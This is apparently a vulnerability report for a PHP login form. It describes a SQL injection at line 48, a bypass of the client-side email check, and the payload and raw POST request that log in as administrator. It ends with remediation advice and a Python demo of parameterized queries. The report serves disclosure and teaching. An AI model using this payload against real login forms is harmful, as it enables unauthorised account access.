Hola 👋🏾
While reviewing the source code I identified a vulnerability in the login form, starting at line 48:
$result= $database->query("select * from webuser where email='$email'");
Because the value of the email field is concatenated directly into the query, an attacker can submit the payload ' OR '1'='1' limit 1 #-- in that field: opening the browser dev tools and changing the input's type from email to text removes the client-side requirement to enter a well-formed email address, and the injected condition then makes the query match regardless of the address, which should allow him to fully bypass authentication and gain access as the administrator.
Proof of Concept
Find below the POC:
I first change the type of the input tag and then I insert the payload:
It then redirects to /admin/.
Additionally, I have also provided the raw request for your reference:
POST /login.php?action=logout HTTP/1.1
Host: localhost:8083
Content-Length: 66
Origin: http://localhost:8083
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Connection: keep-alive
useremail=%27+OR+%271%27%3D%271%27+limit+1+%23--&userpassword=test
Remediation
- Use prepared statements
- Don’t concatenate SQL with user input
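As an added illustration of the remediation (this is not code from the report or from the project, whose login form is PHP/MySQL), the following Python/SQLite model puts the line-48 concatenation pattern next to a parameterized version of the same lookup. The table, rows and function names are constructed for the demo, and the payload's trailing comment marker is adapted to SQLite's `--` syntax because SQLite does not treat `#` as a comment the way MySQL does.

```python
import sqlite3


def make_db():
    # Constructed in-memory stand-in for the application's `webuser` table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE webuser (id INTEGER, email TEXT, role TEXT)")
    db.executemany(
        "INSERT INTO webuser VALUES (?, ?, ?)",
        [(1, "admin@example.test", "admin"), (2, "bob@example.test", "user")],
    )
    return db


def find_user_vulnerable(db, email):
    # Mirrors the reported line 48: the user-controlled value becomes part of
    # the SQL text, so quotes in it change the structure of the statement.
    sql = f"select * from webuser where email='{email}'"
    return db.execute(sql).fetchone()


def find_user_fixed(db, email):
    # Prepared statement: the query text is fixed and the value travels as a
    # bound parameter, so it can only ever be compared as data.
    return db.execute("select * from webuser where email=?", (email,)).fetchone()


# The report's payload with `#` replaced by SQLite's `--` comment marker
# (constructed test input for this demo).
PAYLOAD = "' OR '1'='1' limit 1 --"


def demo():
    db = make_db()
    vuln = find_user_vulnerable(db, PAYLOAD)   # first row: the admin account
    fixed = find_user_fixed(db, PAYLOAD)       # no such email: None
    legit = find_user_fixed(db, "bob@example.test")  # normal lookup still works
    return vuln, fixed, legit


if __name__ == "__main__":
    print(demo())
```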